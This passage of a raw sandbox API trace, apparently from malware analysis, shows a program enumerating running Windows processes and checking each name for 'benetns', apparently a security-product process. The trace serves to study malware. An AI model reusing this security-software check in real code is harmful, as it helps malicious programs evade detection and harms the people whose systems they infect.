(in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.546] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581e80 [0177.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3581e80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0177.546] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0177.546] StrStrIA (lpFirst="services.exe", lpSrch="benetns") returned 0x0 [0177.546] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.547] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3581fb8 [0177.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3581fb8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0177.547] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0177.547] StrStrIA (lpFirst="lsass.exe", lpSrch="benetns") returned 0x0 [0177.547] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.549] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582018 [0177.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582018, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.549] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.549] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.549] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0177.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.550] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3582060 [0177.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582060, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0177.550] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0177.550] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="benetns") returned 0x0 [0177.550] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0177.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.552] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3582078 [0177.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3582078, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0177.552] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0177.552] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="benetns") returned 0x0 [0177.552] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.553] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581ef8 [0177.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581ef8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.553] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.553] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.553] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0177.554] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3586b70 [0177.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3586b70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0177.554] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0177.554] StrStrIA (lpFirst="dwm.exe", lpSrch="benetns") returned 0x0 [0177.554] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5f, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.555] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582090 [0177.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582090, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.555] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.555] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.556] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.557] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581e08 [0177.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581e08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.557] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.557] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.557] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.558] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581f10 [0177.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581f10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.558] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.558] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.558] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.560] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35820a8 [0177.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35820a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.560] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.560] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.560] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.561] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581e50 [0177.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581e50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.561] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.561] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.561] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.563] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581f40 [0177.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581f40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.563] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.563] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.563] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.564] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581f58 [0177.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581f58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.565] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.565] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.565] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.566] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582030 [0177.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582030, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.566] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.566] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.566] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.567] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581e68 [0177.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581e68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.568] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.568] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.568] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.569] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581fd0 [0177.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581fd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.569] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.569] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.569] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.570] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581f70 [0177.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3581f70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0177.571] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0177.571] StrStrIA (lpFirst="spoolsv.exe", lpSrch="benetns") returned 0x0 [0177.571] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.572] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581e98 [0177.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581e98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.572] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.572] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.572] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.573] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581eb0 [0177.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3581eb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0177.573] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0177.573] StrStrIA (lpFirst="audiodg.exe", lpSrch="benetns") returned 0x0 [0177.574] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0177.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.575] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581e20 [0177.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3581e20, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0177.575] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0177.575] StrStrIA (lpFirst="sihost.exe", lpSrch="benetns") returned 0x0 [0177.575] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.576] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581df0 [0177.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581df0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.576] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.576] StrStrIA (lpFirst="svchost.exe", lpSrch="benetns") returned 0x0 [0177.576] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.583] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3581ec8 [0177.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3581ec8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0177.583] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0177.583] StrStrIA (lpFirst="taskhostw.exe", lpSrch="benetns") returned 0x0 [0177.583] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.584] LocalAlloc 